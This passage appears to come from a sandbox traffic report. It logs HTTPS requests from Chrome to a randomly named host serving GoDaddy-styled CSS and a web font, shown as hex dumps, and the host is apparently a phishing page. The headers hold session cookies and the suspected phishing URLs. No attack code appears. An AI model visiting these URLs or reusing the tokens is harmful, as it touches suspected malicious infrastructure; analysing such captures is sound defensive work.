                          Data Ascii: ht:1.25rem!important}#sections .bold{font-weight:700}#sections #accessblockedtroubleshootingcontent .table-cell:first-child,.row.tile .table-cell:first-child+.table-cell,.w-100{width:100%}#sections .debug-details-header{margin-bottom:10px}#sections .debug
                          2024-05-22 15:57:22 UTC1369INData Raw: 2c 32 35 35 2c 32 35 35 2c 2e 34 29 7d 2e 72 61 64 69 6f 20 69 6e 70 75 74 5b 74 79 70 65 3d 72 61 64 69 6f 5d 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 32 38 70 78 7d 2e 69 6e 70 75 74 2d 67 72 6f 75 70 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 64 69 73 70 6c 61 79 3a 74 61 62 6c 65 3b 62 6f 72 64 65 72 2d 63 6f 6c 6c 61 70 73 65 3a 73 65 70 61 72 61 74 65 7d 2e 69 6e 70 75 74 2d 67 72 6f 75 70 20 2e 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7a 2d 69 6e 64 65 78 3a 32 3b 66 6c 6f 61 74 3a 6c 65 66 74 3b 77 69 64 74 68 3a 31 30 30 25 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 30 7d 2e 69 6e 70 75 74 2d 67 72 6f 75 70 20 2e 66 6f 72 6d
                          Data Ascii: ,255,255,.4)}.radio input[type=radio]{position:absolute;margin-left:-28px}.input-group{position:relative;display:table;border-collapse:separate}.input-group .form-control{position:relative;z-index:2;float:left;width:100%;margin-bottom:0}.input-group .form


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          28192.168.2.449770188.114.96.34435640C:\Program Files\Google\Chrome\Application\chrome.exe
                          TimestampBytes transferredDirectionData
                          2024-05-22 15:57:21 UTC1363OUTGET /xyHr8Q78qpqZef29 HTTP/1.1
                          Host: oknya83345.eleteriod.com
                          Connection: keep-alive
                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                          sec-ch-ua-mobile: ?0
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          sec-ch-ua-platform: "Windows"
                          Accept: text/css,*/*;q=0.1
                          Sec-Fetch-Site: same-origin
                          Sec-Fetch-Mode: no-cors
                          Sec-Fetch-Dest: style
                          Referer: https://oknya83345.eleteriod.com/WPGCIMWLOYQUYKLSVXWexeqyspkahuudlxpe?MFQYAAPOWMPCFNJXWICdofoymgcxajjtkmhzggxs
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          Cookie: XSRF-TOKEN=eyJpdiI6IkdzWDYyODR6NmlZdjNJWXVjd3NjRWc9PSIsInZhbHVlIjoiRXFqNDJES1VuM2wvNXFzK3hnWmVkRFhSSHJZMGg0VVA3S2I1ZlowaWQyWVE4Y2kxMS9lVVNzbG9MOFBPWS9USWx4V0d5RjF3SU1NZGZkbm1VM214VXk0K0hQVkdwMGF6QW5qeGx6YWlJMHBVcE1HU3BaY2V3Tmp0RElWZjJxTHAiLCJtYWMiOiI1Yzc2ZmExYzU1OGFmMDc4MDFkMjFmZmM3ZjgwYjZhOTAyZjYwZmVhZGVkMGU1ZjM2N2FkODQwZmI2NTYzOTNhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlIyV0dETU5HdGx4czVsb0RvNCtWbmc9PSIsInZhbHVlIjoiSVVDWEl2cVpDNVpDZk5rQnpjaXgzSXJScGliRGg1b2R1T2FmdEdvSDMxWmZnblJFczlNWW8ydlZkSEdGVnNwYVJqaVFxeDNOTjFDQ0ZOY0x2ZXBTdElMVTR2U3dUa3h5Wnc0Zk5aa0czK1lmQ1o3K2lPQ0xKTFZUT0dNRC8yblgiLCJtYWMiOiJkYzc5NzRlN2U4NWZjMTJhZDYzYzE5MWI5ZmQxY2I0NTQ5MjY2MGRhZWFmN2JkYzIwNjJkYmRhM2EzZGVhZjNjIiwidGFnIjoiIn0%3D
                          2024-05-22 15:57:22 UTC634INHTTP/1.1 200 OK
                          Date: Wed, 22 May 2024 15:57:22 GMT
                          Content-Type: text/css;charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: close
                          Content-Disposition: inline; filename="xyHr8Q78qpqZef29"
                          CF-Cache-Status: DYNAMIC
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mmM%2BqvcGyjb669vhnDhjddqsbBVZllso3gXi26nBn0sEhsin%2B%2BJjDBSO77IhTkXZ9ZfHgQko%2FFpliTlsxnksHIh3MgOWYzlr9aaIk3moIlVUS6HnACB%2BQk0Bo%2BVCPA%3D%3D"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          alt-svc: h3=":443"; ma=86400
                          Server: cloudflare
                          CF-RAY: 887e005fec800f55-EWR
                          2024-05-22 15:57:22 UTC735INData Raw: 33 37 62 61 0d 0a 40 66 6f 6e 74 2d 66 61 63 65 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 67 64 73 68 65 72 70 61 27 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 37 30 30 3b 73 72 63 3a 20 75 72 6c 28 27 2f 77 65 62 38 2f 61 73 73 65 74 73 2f 66 6f 6e 74 73 2f 47 44 53 68 65 72 70 61 2d 62 6f 6c 64 2e 77 6f 66 66 32 27 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 2c 75 72 6c 28 27 2f 77 65 62 38 2f 61 73 73 65 74 73 2f 66 6f 6e 74 73 2f 47 44 53 68 65 72 70 61 2d 62 6f 6c 64 2e 77 6f 66 66 27 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 27 29 3b 75 6e 69 63 6f 64 65 2d 72 61 6e 67 65 3a 20 55 2b 30 2d 31 30 46 46 46 46 3b 66 6f 6e 74 2d 64 69 73 70 6c 61 79 3a 20 73 77 61 70 3b 7d 40 66 6f 6e 74 2d 66 61 63 65 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20
                          Data Ascii: 37ba@font-face{font-family: 'gdsherpa';font-weight: 700;src: url('/web8/assets/fonts/GDSherpa-bold.woff2') format('woff2'),url('/web8/assets/fonts/GDSherpa-bold.woff') format('woff');unicode-range: U+0-10FFFF;font-display: swap;}@font-face{font-family:
                          2024-05-22 15:57:22 UTC1369INData Raw: 6e 74 2d 77 65 69 67 68 74 3a 20 31 20 39 30 30 3b 73 72 63 3a 20 75 72 6c 28 27 2f 77 65 62 38 2f 61 73 73 65 74 73 2f 66 6f 6e 74 73 2f 47 44 53 68 65 72 70 61 2d 76 66 32 2e 77 6f 66 66 32 27 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 2c 75 72 6c 28 27 2f 77 65 62 38 2f 61 73 73 65 74 73 2f 66 6f 6e 74 73 2f 47 44 53 68 65 72 70 61 2d 76 66 32 2e 77 6f 66 66 32 27 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 2d 76 61 72 69 61 74 69 6f 6e 73 27 29 3b 75 6e 69 63 6f 64 65 2d 72 61 6e 67 65 3a 20 55 2b 30 2d 31 30 46 46 46 46 3b 66 6f 6e 74 2d 64 69 73 70 6c 61 79 3a 20 73 77 61 70 3b 7d 40 66 6f 6e 74 2d 66 61 63 65 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 67 64 2d 73 61 67 65 27 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 37 30 30 3b 73 72 63
                          Data Ascii: nt-weight: 1 900;src: url('/web8/assets/fonts/GDSherpa-vf2.woff2') format('woff2'),url('/web8/assets/fonts/GDSherpa-vf2.woff2') format('woff2-variations');unicode-range: U+0-10FFFF;font-display: swap;}@font-face{font-family: 'gd-sage';font-weight: 700;src
                          2024-05-22 15:57:22 UTC1369INData Raw: 20 2d 20 31 2e 35 65 6d 29 20 2f 20 32 29 3b 0d 0a 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 76 61 72 28 2d 2d 75 78 2d 31 66 37 69 66 35 70 2c 75 6e 64 65 72 6c 69 6e 65 29 3b 0d 0a 20 20 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 76 61 72 28 2d 2d 75 78 2d 31 66 37 69 66 35 70 2c 75 6e 64 65 72 6c 69 6e 65 29 3b 0d 0a 20 20 67 61 70 3a 20 30 2e 35 65 6d 3b 0d 0a 20 20 63 75 72 73 6f 72 3a 20 70 6f 69 6e 74 65 72 3b 0d 0a 20 20 2d 2d 75 78 2d 62 75 74 74 6f 6e 2d 69 63 6f 6e 2d 6d 61 72 67 69 6e 3a 20 63 61 6c 63 28 28 76 61 72 28 2d 2d 75 78 2d 74 33 37 39 6f 76 2c 76 61 72 28 2d 2d 75 78 2d 6a 77 35 73 39 6a 2c 31 2e 35 29 29 20 2a 20 31 65 6d 20 2d 20 31 2e 35
                          Data Ascii: - 1.5em) / 2); padding: 0; text-decoration: var(--ux-1f7if5p,underline); -webkit-text-decoration: var(--ux-1f7if5p,underline); gap: 0.5em; cursor: pointer; --ux-button-icon-margin: calc((var(--ux-t379ov,var(--ux-jw5s9j,1.5)) * 1em - 1.5
                          2024-05-22 15:57:22 UTC1369INData Raw: 69 6e 67 2d 73 69 7a 65 29 3b 0d 0a 7d 0d 0a 0d 0a 23 73 65 63 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 20 2e 75 78 2d 73 70 61 63 65 2e 75 78 2d 73 70 61 63 65 2d 2d 62 6c 6f 63 6b 3a 65 6d 70 74 79 20 7b 0d 0a 20 20 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 2d 66 6c 65 78 3b 0d 0a 20 20 62 6c 6f 63 6b 2d 73 69 7a 65 3a 20 76 61 72 28 2d 2d 75 78 53 70 61 63 65 2d 2d 70 61 64 64 69 6e 67 2d 73 69 7a 65 29 3b 0d 0a 7d 0d 0a 0d 0a 23 73 65 63 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 20 2e 75 78 2d 73 70 61 63 65 2e 75 78 2d 73 70 61 63 65 2d 2d 62 6c 6f 63 6b 3a 6e 6f 74 28 3a 65 6d 70 74 79 29 20 7b 0d 0a 20 20 70 61 64 64 69 6e 67 2d 62 6c 6f 63 6b 3a 20 76 61 72 28 2d 2d 75 78 53 70 61 63 65 2d 2d 70 61 64 64 69 6e 67 2d 73 69 7a 65 29 3b 0d 0a 7d 0d 0a
                          Data Ascii: ing-size);}#sections_godaddy .ux-space.ux-space--block:empty { display: inline-flex; block-size: var(--uxSpace--padding-size);}#sections_godaddy .ux-space.ux-space--block:not(:empty) { padding-block: var(--uxSpace--padding-size);}
                          2024-05-22 15:57:22 UTC1369INData Raw: 37 73 34 70 33 76 2c 31 2e 31 32 35 29 29 3b 0d 0a 20 20 2d 2d 75 78 54 65 78 74 2d 2d 66 6f 6e 74 53 69 7a 65 33 3a 20 63 61 6c 63 28 76 61 72 28 2d 2d 75 78 54 65 78 74 2d 2d 66 6f 6e 74 53 69 7a 65 32 29 20 76 61 72 28 2d 2d 75 78 2d 79 34 70 67 38 7a 2c 2a 29 20 76 61 72 28 2d 2d 75 78 2d 37 73 34 70 33 76 2c 31 2e 31 32 35 29 29 3b 0d 0a 20 20 2d 2d 75 78 54 65 78 74 2d 2d 66 6f 6e 74 53 69 7a 65 34 3a 20 63 61 6c 63 28 76 61 72 28 2d 2d 75 78 54 65 78 74 2d 2d 66 6f 6e 74 53 69 7a 65 33 29 20 76 61 72 28 2d 2d 75 78 2d 79 34 70 67 38 7a 2c 2a 29 20 76 61 72 28 2d 2d 75 78 2d 37 73 34 70 33 76 2c 31 2e 31 32 35 29 29 3b 0d 0a 20 20 2d 2d 75 78 54 65 78 74 2d 2d 66 6f 6e 74 53 69 7a 65 35 3a 20 63 61 6c 63 28 76 61 72 28 2d 2d 75 78 54 65 78 74 2d 2d
                          Data Ascii: 7s4p3v,1.125)); --uxText--fontSize3: calc(var(--uxText--fontSize2) var(--ux-y4pg8z,*) var(--ux-7s4p3v,1.125)); --uxText--fontSize4: calc(var(--uxText--fontSize3) var(--ux-y4pg8z,*) var(--ux-7s4p3v,1.125)); --uxText--fontSize5: calc(var(--uxText--
                          2024-05-22 15:57:22 UTC1369INData Raw: 20 20 63 6f 6c 6f 72 3a 20 63 75 72 72 65 6e 74 43 6f 6c 6f 72 3b 0d 0a 20 20 66 69 6c 6c 3a 20 63 75 72 72 65 6e 74 43 6f 6c 6f 72 3b 0d 0a 7d 0d 0a 0d 0a 23 73 65 63 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 20 2e 75 78 2d 74 65 78 74 2d 69 6e 70 75 74 2d 73 68 65 6c 6c 20 2e 75 78 2d 74 65 78 74 2d 63 61 70 74 69 6f 6e 20 7b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 36 70 78 3b 0d 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 33 70 78 3b 0d 0a 7d 0d 0a 0d 0a 0d 0a 23 73 65 63 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 20 2e 75 78 2d 66 69 65 6c 64 2d 66 72 61 6d 65 2e 75 78 2d 66 69 65 6c 64 2d 66 72 61 6d 65 2d 2d 69 6e 76 61 6c 69 64 20 7b 0d 0a 20 20 20 20 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 44 42 31 38 30 32 20 21 69 6d 70 6f 72
                          Data Ascii: color: currentColor; fill: currentColor;}#sections_godaddy .ux-text-input-shell .ux-text-caption { margin-top: 6px; font-size: 13px;}#sections_godaddy .ux-field-frame.ux-field-frame--invalid { border-color: #DB1802 !impor
                          2024-05-22 15:57:22 UTC1369INData Raw: 73 65 63 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 20 2e 73 72 2d 6f 6e 6c 79 20 7b 0d 0a 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0d 0a 20 20 77 69 64 74 68 3a 20 31 70 78 3b 0d 0a 20 20 68 65 69 67 68 74 3a 20 31 70 78 3b 0d 0a 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 0d 0a 20 20 2d 77 65 62 6b 69 74 2d 63 6c 69 70 3a 20 72 65 63 74 28 30 2c 30 2c 30 2c 30 29 3b 0d 0a 20 20 63 6c 69 70 3a 20 72 65 63 74 28 30 2c 30 2c 30 2c 30 29 3b 0d 0a 20 20 77 68 69 74 65 2d 73 70 61 63 65 3a 20 6e 6f 77 72 61 70 3b 0d 0a 20 20 2d 77 65 62 6b 69 74 2d 63 6c 69 70 2d 70 61 74 68 3a 20 69 6e 73 65 74 28 35 30 25 29 3b 0d 0a 20 20 63 6c 69 70 2d 70 61 74 68 3a 20 69 6e 73 65 74 28 35 30 25
                          Data Ascii: sections_godaddy .sr-only { position: absolute; width: 1px; height: 1px; padding: 0; overflow: hidden; -webkit-clip: rect(0,0,0,0); clip: rect(0,0,0,0); white-space: nowrap; -webkit-clip-path: inset(50%); clip-path: inset(50%
                          2024-05-22 15:57:22 UTC1369INData Raw: 62 6f 72 64 65 72 2d 62 6f 78 3b 0d 0a 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 2e 30 39 33 37 35 72 65 6d 3b 0d 0a 7d 0d 0a 0d 0a 23 73 65 63 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0d 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0d 0a 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0d 0a 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 38 70 78 3b 0d 0a 20 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 38 70 78 3b 0d 0a 7d 0d 0a 0d 0a 23 73 65 63 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 20 2e 63 6f 6e 74 61 69 6e 65 72 3a 3a 61 66 74 65 72 20 7b 0d 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 22 3b 0d 0a 20 20 64 69 73 70 6c 61 79 3a
                          Data Ascii: border-box; padding: 0; vertical-align: .09375rem;}#sections_godaddy .container { margin-left: auto; margin-right: auto; padding-left: 8px; padding-right: 8px;}#sections_godaddy .container::after { content: ""; display:
                          2024-05-22 15:57:22 UTC1369INData Raw: 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 76 61 72 28 2d 2d 75 78 2d 39 37 68 33 76 6c 2c 23 64 33 64 33 64 33 29 3b 0d 0a 7d 0d 0a 0d 0a 23 73 65 63 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 20 2e 75 78 2d 63 61 72 64 20 2e 63 61 72 64 2d 62 6c 6f 63 6b 20 7b 0d 0a 20 20 70 61 64 64 69 6e 67 3a 20 63 61 6c 63 28 76 61 72 28 2d 2d 75 78 2d 31 73 62 66 69 67 38 2c 2e 32 35 72 65 6d 29 20 2a 20 35 29 3b 0d 0a 7d 0d 0a 0d 0a 23 73 65 63 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 20 2e 66 6f 6e 74 2d 70 72 69 6d 61 72 79 2d 62 6f 6c 64 20 7b 0d 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 61 72 28 2d 2d 75 78 2d 31 30 36 37 70 68 39 2c 73 61 6e 73 2d 73 65 72 69 66 29 3b 0d 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 65 72 3b 0d 0a 7d 0d 0a 0d 0a
                          Data Ascii: r: 1px solid var(--ux-97h3vl,#d3d3d3);}#sections_godaddy .ux-card .card-block { padding: calc(var(--ux-1sbfig8,.25rem) * 5);}#sections_godaddy .font-primary-bold { font-family: var(--ux-1067ph9,sans-serif); font-weight: bolder;}
                          2024-05-22 15:57:22 UTC1369INData Raw: 6a 75 30 68 2c 76 61 72 28 2d 2d 75 78 2d 39 71 70 66 36 63 2c 23 30 30 66 29 29 3b 0d 0a 20 20 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 75 78 2d 75 71 34 39 70 67 2c 76 61 72 28 2d 2d 75 78 2d 68 36 65 37 63 31 2c 23 66 66 66 29 29 3b 0d 0a 20 20 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 75 78 2d 34 68 76 6f 76 6e 2c 76 61 72 28 2d 2d 75 78 2d 31 78 6c 69 75 68 69 2c 74 72 61 6e 73 70 61 72 65 6e 74 29 29 3b 0d 0a 7d 0d 0a 0d 0a 23 73 65 63 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 20 2e 75 78 2d 62 75 74 74 6f 6e 2e 75 78 2d 62 75 74 74 6f 6e 2d 70 72 69 6d 61 72 79 20 7b 0d 0a 20 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0d 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0d 0a 20 20 62 6f 72 64 65 72 2d 63 6f 6c
                          Data Ascii: ju0h,var(--ux-9qpf6c,#00f)); color: var(--ux-uq49pg,var(--ux-h6e7c1,#fff)); border-color: var(--ux-4hvovn,var(--ux-1xliuhi,transparent));}#sections_godaddy .ux-button.ux-button-primary { color: #fff; background-color: #000; border-col


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          29192.168.2.449773188.114.96.34435640C:\Program Files\Google\Chrome\Application\chrome.exe
                          TimestampBytes transferredDirectionData
                          2024-05-22 15:57:21 UTC1392OUTGET /pq0hAI7qxScx87yzfXwx40 HTTP/1.1
                          Host: oknya83345.eleteriod.com
                          Connection: keep-alive
                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                          Origin: https://oknya83345.eleteriod.com
                          sec-ch-ua-mobile: ?0
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          sec-ch-ua-platform: "Windows"
                          Accept: */*
                          Sec-Fetch-Site: same-origin
                          Sec-Fetch-Mode: cors
                          Sec-Fetch-Dest: font
                          Referer: https://oknya83345.eleteriod.com/WPGCIMWLOYQUYKLSVXWexeqyspkahuudlxpe?MFQYAAPOWMPCFNJXWICdofoymgcxajjtkmhzggxs
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          Cookie: XSRF-TOKEN=eyJpdiI6IkdzWDYyODR6NmlZdjNJWXVjd3NjRWc9PSIsInZhbHVlIjoiRXFqNDJES1VuM2wvNXFzK3hnWmVkRFhSSHJZMGg0VVA3S2I1ZlowaWQyWVE4Y2kxMS9lVVNzbG9MOFBPWS9USWx4V0d5RjF3SU1NZGZkbm1VM214VXk0K0hQVkdwMGF6QW5qeGx6YWlJMHBVcE1HU3BaY2V3Tmp0RElWZjJxTHAiLCJtYWMiOiI1Yzc2ZmExYzU1OGFmMDc4MDFkMjFmZmM3ZjgwYjZhOTAyZjYwZmVhZGVkMGU1ZjM2N2FkODQwZmI2NTYzOTNhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlIyV0dETU5HdGx4czVsb0RvNCtWbmc9PSIsInZhbHVlIjoiSVVDWEl2cVpDNVpDZk5rQnpjaXgzSXJScGliRGg1b2R1T2FmdEdvSDMxWmZnblJFczlNWW8ydlZkSEdGVnNwYVJqaVFxeDNOTjFDQ0ZOY0x2ZXBTdElMVTR2U3dUa3h5Wnc0Zk5aa0czK1lmQ1o3K2lPQ0xKTFZUT0dNRC8yblgiLCJtYWMiOiJkYzc5NzRlN2U4NWZjMTJhZDYzYzE5MWI5ZmQxY2I0NTQ5MjY2MGRhZWFmN2JkYzIwNjJkYmRhM2EzZGVhZjNjIiwidGFnIjoiIn0%3D
                          2024-05-22 15:57:22 UTC617INHTTP/1.1 200 OK
                          Date: Wed, 22 May 2024 15:57:22 GMT
                          Content-Type: font/woff2
                          Content-Length: 28000
                          Connection: close
                          Content-Disposition: inline; filename="pq0hAI7qxScx87yzfXwx40"
                          CF-Cache-Status: DYNAMIC
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BgtFhV8CePernkRYDdifRFEM9COImT2kE6QPTEwXQ4rJ5hNIn%2FUIbQ1mw74WUyLnPJUWHgXHSdUMr14Tej%2FceBUh0F0cdXfnILDX9mA%2BfX3CRC8r7v46kkl6KJAlng%3D%3D"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          alt-svc: h3=":443"; ma=86400
                          Server: cloudflare
                          CF-RAY: 887e00601f6f7c81-EWR
                          2024-05-22 15:57:22 UTC752INData Raw: 77 4f 46 32 00 01 00 00 00 00 6d 60 00 10 00 00 00 01 24 08 00 00 6c fd 00 01 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 81 9d 36 1c 89 16 06 60 00 8e 3c 08 3c 09 97 62 11 08 0a 82 bb 24 82 9c 7f 01 36 02 24 03 8e 78 0b 87 3e 00 04 20 05 8c 03 07 97 7b 0c 81 0d 5b 09 10 71 05 6b b7 5d 5d 4f 88 db 06 10 73 b3 fd a9 7c 99 02 6e 8c 9b c7 21 18 d6 5b 3c 3b 10 83 ee e0 50 26 a6 cf 67 ff ff ff bf 21 a9 c8 98 49 27 69 b7 0d 51 01 44 50 d5 df 9f c4 1e 39 02 92 4a a0 06 b7 80 17 c1 39 47 eb 95 e9 98 51 31 28 8b f2 29 4a 6e c6 19 d5 d4 c5 d4 38 59 f3 d2 1b f9 1a 98 29 4a ce 46 0e 63 20 41 96 af 37 6b ab 76 b3 8b e9 32 3d a1 5a ee 6e fa 34 60 12 ed 81 a0 c0 7e 4e 6c a4 81 ef 34 3b aa 91 07 53 f6 6c 7b 77 c7 c7 3a ae 23 d5 ee aa 3d 21 bc 20
                          Data Ascii: wOF2m`$lB6`<<b$6$x> {[qk]]Os|n![<;P&g!I'iQDP9J9GQ1()Jn8Y)JFc A7kv2=Zn4`~Nl4;Sl{w:#=!
                          2024-05-22 15:57:22 UTC1369INData Raw: 68 b0 50 00 7c 22 4d 93 ae 4a 51 a6 00 02 1a e0 df 3f 60 01 fc 53 40 7b df ed 6f 97 f6 52 6a 43 45 a1 71 78 8f 70 92 21 28 57 69 9f a4 1b eb 64 59 b5 25 ff 2f 72 f2 23 13 70 04 e7 43 20 15 c4 93 e2 e9 00 00 81 82 83 f3 72 1e 6f 34 50 f1 7d e4 e6 7f 33 58 92 99 5d 88 fc f3 a2 d4 ae 01 36 f2 9e 27 7e 26 b0 d3 c0 5d b7 b4 a7 2a 79 09 f4 8f b6 ff 59 51 82 a7 39 e1 22 76 b7 c3 17 cb 33 f0 af 90 a0 d9 6f 45 4d 51 6f 57 4d 16 57 60 cc 85 de 1f 9a 8a 01 13 c4 07 db cc a4 0e 94 94 10 82 59 08 56 81 8a 4f 32 11 7f ee f1 f8 f4 6c 83 02 c7 ac 9d 70 01 31 87 f4 42 a5 c2 bf 46 6e 0e 7f 6f 10 3c d0 ab a8 2c 43 8f f7 0f fd 97 f8 5e c0 59 e6 43 00 b6 fe 57 ae e9 b6 74 58 e2 11 7c a8 60 d2 a6 bc 97 35 3a f7 59 64 40 5d e5 12 6a 18 bb 24 b6 dc ca 76 b6 2a 43 18 44 fe 71 a9
                          Data Ascii: hP|"MJQ?`S@{oRjCEqxp!(WidY%/r#pC ro4P}3X]6'~&]*yYQ9"v3oEMQoWMW`YVO2lp1BFno<,C^YCWtX|`5:Yd@]j$v*CDq
                          2024-05-22 15:57:22 UTC1369INData Raw: 9a cf 32 9d 4d e7 8a 0a 96 48 c8 6c 22 d8 b5 a2 1b ed 62 bc b1 36 52 21 05 95 14 c7 81 94 35 dc bc 61 7e c1 b4 7a 90 11 b4 ca 1d 10 b9 22 0a 08 40 c0 9b 31 90 dc 27 05 17 40 40 05 00 50 85 55 b6 46 4e 76 17 a1 cf f8 91 28 18 bc 86 dd 28 8a 0d 6e 1d 26 6e 7d 95 e8 90 58 8c 91 02 38 4a a0 94 87 e5 5a 50 e2 4c bc d0 25 06 2b 80 8c c4 05 99 9c 71 86 d8 29 ca 83 fb a6 88 8f df 77 45 f5 08 aa 72 b3 dd 04 90 49 e7 01 a0 73 40 15 14 14 29 cb f1 82 58 04 82 31 5a 02 29 dc 92 31 91 53 51 02 a6 fa 29 2a 80 d8 45 b8 e5 49 0f 90 d8 00 4a f9 09 a8 6e 75 4c 81 89 2f 00 77 7d b0 d2 75 b4 ea 9a ae 67 98 3e 3c 14 be 13 55 48 55 f9 1e 60 2e ed fc 69 cf da b5 42 06 20 96 20 07 60 a8 05 c2 4c f9 e3 9b e0 38 ab d1 83 9b 3a 8b 85 5e ca a3 dc 75 85 2b e0 30 ac 55 ea ed 61 ee f8
                          Data Ascii: 2MHl"b6R!5a~z"@1'@@PUFNv((n&n}X8JZPL%+q)wErIs@)X1Z)1SQ)*EIJnuL/w}ug><UHU`.iB `L8:^u+0Ua
                          2024-05-22 15:57:22 UTC1369INData Raw: 39 aa 76 68 dd 8c 5b 2f 6b 9f 1d b3 c9 cf 85 80 7e 4d 7d 1c 44 b5 56 8e d5 c6 7d 25 c4 02 3b 1b 15 6b 50 8d 7e cb ba 24 26 a5 bb 63 d1 11 53 27 2b df 09 8c 31 2c f4 05 2d 8e 9d 58 08 42 45 de 45 e3 4e a2 83 07 5d cd 4a 33 e0 b5 97 e1 ae c5 ad d6 f0 84 e2 b0 3c c6 03 e7 41 3f 7a 78 70 cc 8c 76 2e 02 cf b0 85 b1 bb 8b 6f c8 80 02 d5 9e 4a 0a a0 e3 4b b7 9b 9f c2 a6 10 af 98 9a 67 7a 8f e4 ad 45 d1 58 cc 2e ad 55 97 e2 39 c3 32 ea cd 24 ff 27 7b 73 5b b5 87 25 e3 73 aa 4d 39 f0 18 1c e6 1b 82 af d3 ba d2 3c 76 ce 79 bf b0 50 9d c3 58 69 34 3f af 43 4d 37 3b 6c 0d ce 6f 77 95 ec 53 d8 54 86 b1 6d 91 2a 74 76 a0 4a b1 bf 18 8f 94 7e cf d7 cf f4 a0 5e 55 14 0e 79 da 72 32 2d 41 57 0e 69 b4 3f 77 7c c5 7f e3 8f 3f 86 9b ff 3b dd 9e 48 b6 50 f6 da 04 3c 9d 93 59
                          Data Ascii: 9vh[/k~M}DV}%;kP~$&cS'+1,-XBEEN]J3<A?zxpv.oJKgzEX.U92$'{s[%sM9<vyPXi4?CM7;lowSTm*tvJ~^Uyr2-AWi?w|?;HP<Y
